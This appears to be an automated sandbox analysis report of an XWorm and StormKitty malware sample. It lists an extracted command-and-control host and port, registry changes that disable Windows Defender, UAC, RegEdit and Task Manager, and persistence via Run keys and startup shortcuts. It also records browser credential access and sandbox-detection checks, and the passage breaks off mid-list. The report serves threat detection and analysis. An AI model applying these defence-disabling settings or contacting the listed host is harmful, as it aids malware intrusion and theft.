Analysis
-
max time kernel
597s -
max time network
655s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
26-12-2024 19:13
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://gofile.io/d/UtAbQk
Resource
win10ltsc2021-20241211-en
General
-
Target
https://gofile.io/d/UtAbQk
Malware Config
Extracted
xworm
mbaper-28496.portmap.host:28833
-
Install_directory
%ProgramData%
-
install_file
.exe
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/2616-429-0x0000000001470000-0x000000000147E000-memory.dmp disable_win_def behavioral1/files/0x000a000000040c00-628.dat disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x00280000000462e7-171.dat family_xworm behavioral1/memory/2616-223-0x0000000000EB0000-0x0000000000EC6000-memory.dmp family_xworm -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" powershell.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" powershell.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/2616-471-0x000000001C620000-0x000000001C740000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2616 created 420 2616 xtasy.exe 109 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" xtasy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" xtasy.exe -
Xworm family
-
pid Process 1528 powershell.exe 5756 powershell.exe 5964 powershell.exe 4320 powershell.exe 5840 powershell.exe 5260 powershell.exe 5528 powershell.exe 864 powershell.exe 4308 powershell.exe 420 powershell.exe 4520 powershell.exe 5564 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" xtasy.exe -
Disables Task Manager via registry modification
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 5552 bitsadmin.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4308 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000\Control Panel\International\Geo\Nation xtasy.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ .lnk xtasy.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ .lnk xtasy.exe -
Executes dropped EXE 2 IoCs
pid Process 2616 xtasy.exe 3040 dismhost.exe -
Loads dropped DLL 5 IoCs
pid Process 3040 dismhost.exe 3040 dismhost.exe 3040 dismhost.exe 3040 dismhost.exe 3040 dismhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\ProgramData\\ .exe" xtasy.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: wmplayer.exe File opened (read-only) \??\H: wmplayer.exe File opened (read-only) \??\T: wmplayer.exe File opened (read-only) \??\R: wmplayer.exe File opened (read-only) \??\S: wmplayer.exe File opened (read-only) \??\B: unregmp2.exe File opened (read-only) \??\J: wmplayer.exe File opened (read-only) \??\R: wmplayer.exe File opened (read-only) \??\V: wmplayer.exe File opened (read-only) \??\W: wmplayer.exe File opened (read-only) \??\H: unregmp2.exe File opened (read-only) \??\I: unregmp2.exe File opened (read-only) \??\Y: unregmp2.exe File opened (read-only) \??\U: wmplayer.exe File opened (read-only) \??\M: wmplayer.exe File opened (read-only) \??\O: wmplayer.exe File opened (read-only) \??\T: wmplayer.exe File opened (read-only) \??\K: wmplayer.exe File opened (read-only) \??\X: wmplayer.exe File opened (read-only) \??\N: wmplayer.exe File opened (read-only) \??\P: unregmp2.exe File opened (read-only) \??\R: unregmp2.exe File opened (read-only) \??\U: unregmp2.exe File opened (read-only) \??\B: wmplayer.exe File opened (read-only) \??\G: wmplayer.exe File opened (read-only) \??\Y: wmplayer.exe File opened (read-only) \??\X: unregmp2.exe File opened (read-only) \??\Q: wmplayer.exe File opened (read-only) \??\I: wmplayer.exe File opened (read-only) \??\K: wmplayer.exe File opened (read-only) \??\Q: wmplayer.exe File opened (read-only) \??\A: unregmp2.exe File opened (read-only) \??\J: unregmp2.exe File opened (read-only) \??\M: unregmp2.exe File opened (read-only) \??\V: unregmp2.exe File opened (read-only) \??\E: wmplayer.exe File opened (read-only) \??\S: wmplayer.exe File opened (read-only) \??\X: wmplayer.exe File opened (read-only) \??\N: unregmp2.exe File opened (read-only) \??\O: unregmp2.exe File opened (read-only) \??\Z: unregmp2.exe File opened (read-only) \??\W: wmplayer.exe File opened (read-only) \??\B: wmplayer.exe File opened (read-only) \??\G: unregmp2.exe File opened (read-only) \??\L: unregmp2.exe File opened (read-only) \??\O: wmplayer.exe File opened (read-only) \??\H: wmplayer.exe File opened (read-only) \??\U: wmplayer.exe File opened (read-only) \??\Y: wmplayer.exe File opened (read-only) \??\Z: wmplayer.exe File opened (read-only) \??\V: wmplayer.exe File opened (read-only) \??\A: wmplayer.exe File opened (read-only) \??\J: wmplayer.exe File opened (read-only) \??\P: wmplayer.exe File opened (read-only) \??\K: unregmp2.exe File opened (read-only) \??\T: unregmp2.exe File opened (read-only) \??\L: wmplayer.exe File opened (read-only) \??\Z: wmplayer.exe File opened (read-only) \??\E: wmplayer.exe File opened (read-only) \??\E: unregmp2.exe File opened (read-only) \??\Q: unregmp2.exe File opened (read-only) \??\M: wmplayer.exe File opened (read-only) \??\P: wmplayer.exe File opened (read-only) \??\S: unregmp2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 92 raw.githubusercontent.com 93 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 51 ip-api.com -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" powershell.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" powershell.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" powershell.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" powershell.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\LogFiles\setupcln\setuperr.log cleanmgr.exe File opened for modification C:\Windows\system32\LogFiles\setupcln\diagerr.xml cleanmgr.exe File opened for modification C:\Windows\system32\LogFiles\setupcln\diagwrn.xml cleanmgr.exe File opened for modification C:\Windows\system32\LogFiles\setupcln\setupact.log cleanmgr.exe File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5\ xtasy.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\0d1c7923-8753-4170-bb76-9e9e8b89c4ad.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241226191325.pma setup.exe File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\javapath\ xtasy.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\Panther\UnattendGC\setupact.log WindowsBackupClient.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml WindowsBackupClient.exe File opened for modification C:\Windows\Panther\UnattendGC\setupact.log UserOOBEBroker.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log WindowsBackupClient.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml UserOOBEBroker.exe File opened for modification C:\Windows\Logs\DISM\dism.log cleanmgr.exe File opened for modification C:\Windows\CbsTemp TiWorker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml WindowsBackupClient.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log UserOOBEBroker.exe File opened for modification C:\Windows\INF\setupapi.dev.log cleanmgr.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll svchost.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml UserOOBEBroker.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4376 sc.exe 5648 sc.exe 5628 sc.exe 4512 sc.exe 5168 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 1960 6716 WerFault.exe 243 -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language unregmp2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmplayer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FileCoAuth.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmplayer.exe -
Checks SCSI registry key(s) 3 TTPs 46 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName Taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 Taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067\ cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015 cleanmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067\ cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 cleanmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 cleanmgr.exe -
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 xtasy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier xtasy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS xtasy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion xtasy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate xtasy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName xtasy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000\Software\Microsoft\Internet Explorer\GPU WindowsBackupClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-2366345620-3342093254-3461191856-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.4355\"hypervisor=\"No Hypervisor (No SLAT)\"" WindowsBackupClient.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) 